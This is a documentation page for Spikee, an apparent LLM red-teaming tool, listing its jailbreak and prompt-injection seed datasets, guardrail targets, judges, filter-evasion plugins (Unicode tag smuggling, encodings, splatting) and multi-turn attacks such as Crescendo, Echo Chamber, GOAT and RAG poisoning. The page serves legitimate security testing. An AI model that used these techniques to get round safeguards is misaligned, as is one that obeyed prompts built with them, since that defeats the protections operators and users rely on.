Skip to content

Latest commit

 

History

History
176 lines (143 loc) · 17.4 KB

File metadata and controls

176 lines (143 loc) · 17.4 KB

Built-In Seeds and Modules

Spikee comes with a variety of built-in seeds and modules (e.g., targets, judges, plugins, attacks).

Jump to Links:

Built-in Seeds

Spikee comes with a variety of built-in seeds, each designed for a specific testing purpose. These seeds are located in the datasets/ directory after you run spikee init. You can list them at any time with spikee list seeds.

Seed Source Type Description
seeds-cybersec-2026-01 Reversec Cybersecurity A general-purpose dataset for testing prompt injection and cybersecurity harms. It focuses on common attack goals seen in web application security, such as data exfiltration, cross-site scripting (XSS), and resource exhaustion.
seeds-harmful-instructions-only Reversec Objectives Specifically designed for attacks using LLM Agents, such as Crescendo and LLM-Jailbreaker. These attacks require a instruction (objective) to generate their own attack vectors dynamically. Contains harmful instructions in instructions.jsonl, while leaving jailbreaks and user inputs as empty placeholders.
seeds-simsonsun-high-quality-jailbreaks External Jailbreaks A high-quality set of contamination-free jailbreak prompts, specifically curated to avoid overlap with the training data of many common safety classifiers.
seeds-in-the-wild-jailbreak-prompts External Jailbreaks Contains approximately 1,400 real-world jailbreak prompts collected from public sources like Discord and Reddit (filtered from the TrustAIRLab dataset). Ideal for testing a target's resilience against known, publicly available jailbreaks.
seeds-wildguardmix-harmful External Harmful A dataset for testing harmful content generation. The prompts are sourced from the WildGuard-Mix dataset.
seeds-wildguardmix-harmful-fp External Harmful (FP) A companion dataset to seeds-wildguardmix-harmful, containing benign (harmless) prompts.
seeds-toxic-chat External Harmful A dataset for testing toxic prompts, filtered from 10K user prompts collected from the Vicuna online demo.
seeds-investment-advice Reversec Topical Guardrails Designed to test topical guardrails that are supposed to block personal financial or investment advice. It includes both malicious instructions and standalone attack prompts.
seeds-investment-advice-fp Reversec Topical Guardrails (FP) A companion dataset to seeds-investment-advice, containing benign (harmless) queries about financial topics.
seeds-sysmsg-extraction-2025-04 Reversec System Prompt Extraction Specifically designed to test for system prompt extraction. The instructions and judges are tailored to detect if the target model leaks its own system prompt or initial instructions.
seeds-llm-mailbox Reversec Tutorial An example seed tailored for testing an email summarization feature. The documents are sample emails, and the instructions are designed to test for vulnerabilities in that specific context. See the associated blog post for a detailed walkthrough.
seeds-empty Reversec Utility An empty template folder. It contains empty documents.jsonl, jailbreaks.jsonl, and instructions.jsonl files. This is the recommended starting point when creating a new dataset from scratch, especially for standalone attacks.
seeds-mini-test Reversec Utility A very small set of examples for quick, functional testing of Spikee itself. Use this to verify your setup or to test a new custom target or plugin without running a large number of tests.

FP datasets are intended for use with the --false-positive-checks flag to measure how often a guardrail incorrectly blocks legitimate prompts when evaluating harmful content filters.

External datasets require you to run a fetch script to download the prompts. See the README.md inside each seed folder for instructions. Some of these use an LLM judge by default, which will be specified in the seed's README.

** Usage Example**

spikee generate --seed ./seeds-cybersec-2026-01

Built-in Targets

Spikee includes a variety of built-in and sample targets, which can be listed at any time with spikee list targets.

Built-in targets focus on several common LLM providers, and will require you to rename .env-example to .env and add any necessary API keys - these are located within the spikee/targets/ folder.

Target Type Description
llm_provider Provider Generic LLM target for supported LLM providers (e.g., openai, bedrock, google, ollama, e.t.c.) (See Docs)
aws_bedrock_guardrail Guardrails Assess AWS Bedrock Guardrails
az_ai_content_safety_harmful Guardrails Assess Azure AI Content Safety Harm Categories
az_prompt_shields_document_analysis Guardrails Assess Azure Prompt Shields Document Analysis
az_prompt_shields_prompt_analysis Guardrails Assess Azure Prompt Shields Prompt Analysis

Sample targets are provided within the workspace/targets/ folder - created by running spikee init. These demonstrate how to write custom targets and can be easily modified to assess an LLM application of your choice.

Target Type Description
sample_target Single-Turn Sends a GET request to a fictional application, demonstrating options and advanced guardrail and error handling.
sample_target_legacy Single-Turn (Legacy) Returns a mock message. This is a legacy target, demonstrating the older target format.
sample_pdf_request_target Single-Turn Sends a POST request containing a PDF to a fictional application.
test_chatbot Multi-Turn Sends requests to Spikee Test Chatbot
simple_test_chatbot Multi-Turn Implements the simple multi-turn target, and sends requests to Spikee Test Chatbot
llm_mailbox Single-Turn Sample target for email summarisation application tutorial

Usage Example

spikee test --dataset datasets/cybersec-2026-01.jsonl \
            --target llm_provider \
            --target-options "bedrock/claude45-haiku"

Built-in Judges

Spikee includes several built-in judges to evaluate LLM responses, located within the spikee/judges/ and workspace/judges/ folders. These can be listed at any time with spikee list judges.

Basic Judges These evaluate responses based on simple criteria.

  • canary: Checks if a predefined canary string is present in the response.
  • regex: Uses regular expressions to identify specific patterns in the response.

LLM Judges Some test cases, success cannot be determined by a simple keyword or pattern. For instance, did the model's response contain harmful advice, or did it refuse to answer a question on a restricted topic?

LLM-based judges address this by using a separate LLM to evaluate the target's response against a natural language criterion.

  • llm_judge_harmful: LLM judge to evaluate whether the target LLMs response complied with a potentially harmful user prompt.
  • llm_judge_objective: LLM judge to evaluate whether the target LLMs response meets a specific input objective.
  • llm_judge_output_criteria: LLM judge to evaluate whether the target LLMs response meets specific success criteria defined in judge_args.

The LLM Agent model can be specified using the --judge-options flag. See LLM Providers for a complete list of supported models, prefixes, and examples. Some common examples include

  • offline: Mock judge, for restrictive environments. See re-judging and isolated environments documentation for more information.
  • bedrock/<model_name>: AWS Bedrock API (e.g., bedrock/claude45-haiku)
  • openai/<model_name>: OpenAI API (e.g., openai/gpt-4o-mini)
  • google/<model_name>: Google Gen AI API (e.g., google/gemini-2.5-flash)

Usage Example

# Use an offline judge, allowing for later re-judging
spikee test --dataset datasets/cybersec-2026-01.jsonl \
            --target llm_provider \
            --target-options "bedrock/claude45-haiku" \
            --judge-options offline

Built-in Plugins

Spikee includes several build-in plugins, that can be leveraged to enhance dataset generation. These are scripts that will apply static transformations to payloads during dataset generation, and can create multiple iterations of each entry. Built-in plugins are located in the spikee/plugins/ directory, local plugins are located in the plugins/ directory within your workspace. You can list them at any time with spikee list plugins.

The following list provides an overview of each build-in plugin, further information on each plugin can be found within the plugin file.

Key:

  • Basic: Simple text transformations.
  • Attack-Based: Plugins based on dynamic attack techniques, but have been adapted to work as static transformations during dataset generation.
  • LLM: Plugins that leverage an LLM agent to generate variations of the input based on a specific attack strategy or objective.
Plugin Type Description Options
1337 Basic Transforms text into "leet speak" by replacing certain letters with numbers or symbols. N/A
ascii_smuggler Basic Transforms ASCII text into a series of Unicode rags that are generally invisible to most UI elements (bypassing content filters). N/A
base64 Basic Encodes text using Base64 encoding. N/A
ceasar Basic Applies a Caesar cipher to the text, shifting letters by a specified number of positions. shift (number of positions to shift, default: 3)
flip Basic Applies a flip attack to obfuscate text:
- FWO: Flip Word Order
- FCW: Flip Chars in Word
- FCS: Flip Chars in Sentence
mode (the flip mode to apply, default: FWO)
google_translate Basic Translates text to another language using google translate. source-lang (language code for source language, default: en)
target-lang (language code for target language, default: zh-cn)
opus_translator Basic Translates text to another language using local OPUS-MT models. source (source language code, default: en)
targets (target language(s), default: zh)
quality (translation quality, default: 1)
device (cpu or gpu, default: auto-detect)
cache_dir (directory to cache ML models, optional)
hex Basic Encodes text into its hexadecimal representation. N/A
mask Basic Masks high-risk words in the text with random character sequences, while providing a suffix that maps the masks back to the original words. advanced (if true, creates multiple masks for longer words)
advanced-split (the number of characters per mask chunk for the advanced option, default: 6)
morse Basic Encodes text into Morse code. N/A
splat Basic Obfuscates the text using splat-based techniques (e.g., asterisks '*', special characters, and spacing tricks), to bypass basic filters. character (the character to use for splatting, default: *)
insert_rand (probability of inserting a splat within words, default: 0.6)
pad_rand (probability of padding words with splats, default: 0.4)
anti_spotlighting Attack-Based Generates variations of delimiter-based attacks to test LLM applications against spotlighting vulnerabilities. variants (number of variations to generate, default: 50)
best_of_n Attack-Based Implements "Best-of-N Jailbreaking" John Hughes et al., 2024 to apply character scrambling, random capitalization, and character noising. variants (number of variations to generate, default: 50)
prompt_decomposition Attack-Based Decomposes a prompt into chunks and generates shuffled variations. modes (LLM model to apply, default: dumb)
variants (number of variations to generate, default: 50)
shortener LLM Uses an LLM to shorten the text to a specified maximum length while retaining key details. max_length (the maximum length for the shortened text, default: 256)
llm_jailbreaker LLM Uses an LLM to iteratively generate jailbreak attacks against the target. model (The LLM model to use for generating attacks, default: model=openai/gpt-4o)
variants (number of variations to generate, default: 5)
llm_multi_language_jailbreaker LLM Generates jailbreak attempts using different languages, focusing on low-resource languages. model (The LLM model to use for generating attacks, default: model=openai/gpt-4o)
variants (number of variations to generate, default: 5)
llm_poetry_jailbreaker LLM Generates jailbreak attempts in the form of poetry or rhymes. model (The LLM model to use for generating attacks, default: model=openai/gpt-4o)
variants (number of variations to generate, default: 5)
rag_poisoner LLM Injects fake RAG context that appears to be legitimate document snippets supporting the attack objective. model (The LLM model to use for generating attacks, default: model=openai/gpt-4o)
variants (number of variations to generate, default: 5)

Usage Example

spikee generate --seed ./seeds-cybersec-2026-01 \
                --plugin best_of_n google_translate|base64 \
                --plugin-options "best_of_n:variants=5;google_translate:source-lang=en"

Built-in Attacks

Spikee includes several built-in dynamic attacks, that will iteratively modify prompts/documents until they succeed (or run out of iterations). These are located within the spikee/attacks/ folder, and can be listed at any time with spikee list attacks.

You can customize the behavior of attacks using the following command-line options:

  • --attack-iterations: Specifies the maximum number of iterations for each attack (default: 1000).
  • --attack-options: Passes a single string option to the attack script for custom behavior (e.g., "mode=aggressive").
Attack Type Description Additional Options
anti_spotlighting Standard Assess spotlighting vulnerabilities by sequentially trying variations of delimiter-based attacks. N/A
best_of_n Standard Implements "Best-of-N Jailbreaking" John Hughes et al., 2024 to apply character scrambling, random capitalization, and character noising. N/A
prompt_decomposition Standard Decomposes a prompt into chunks and generates shuffled variations. modes (LLM model to apply, default: dumb)
variants (number of variations to generate, default: 50)
random_suffix_attack Standard Implements Random Suffix Search techniques, which appends random suffixes to the prompt to bypass filters. N/A
llm_jailbreaker LLM-Driven Uses an LLM to iteratively generate jailbreak attacks against the target. model (The LLM model to use for generating attacks, e.g., model=openai/gpt-4o)
llm_multi_language_jailbreaker LLM-Driven Generates jailbreak attempts using different languages, focusing on low-resource languages. model (The LLM model to use for generating attacks)
llm_poetry_jailbreaker LLM-Driven Generates jailbreak attempts in the form of poetry or rhymes. model (The LLM model to use for generating attacks)
rag_poisoner LLM-Driven Injects fake RAG context that appears to be legitimate document snippets supporting the attack objective. model (The LLM model to use for generating attacks)
multi_turn Simple Multi-Turn Sequentially sends a predefined list of user prompts to the target LLM, from a simplistic multi-turn dataset. N/A
crescendo Instructional Multi-Turn Implements the Crescendo Attack. This is a simple multi-turn jailbreak that leverages an LLM Agent to prompt the target application with seemingly benign prompts, but gradually escalates the conversation by referencing the model's replies progressively leading to a successful jailbreak. N/A
echo_chamber Instructional Multi-Turn Implements the Echo Chamber Attack. This multi-turn attack uses an LLM Agent to create a feedback loop, where the model's own responses are fed back into itself in order to bypass guardrails and achieve jailbreaks. N/A
goat Instructional Multi-Turn Implements the GOAT Attack. This multi-turn attack uses an LLM, acting as an automated red teaming agent, that can implement a range of adversarial prompting and jailbreaking techniques to achieve an objective. See file for target specific configuration using APPLICATION_CONFIG and APPLICATION_GUARDRAILS.

Usage Example

spikee test --dataset datasets/dataset-name.jsonl \
            --target demo_llm_application \
            --attack crescendo \
            --attack-options 'max-turns=5,model=bedrock/deepseek-v3' \
            --attack-only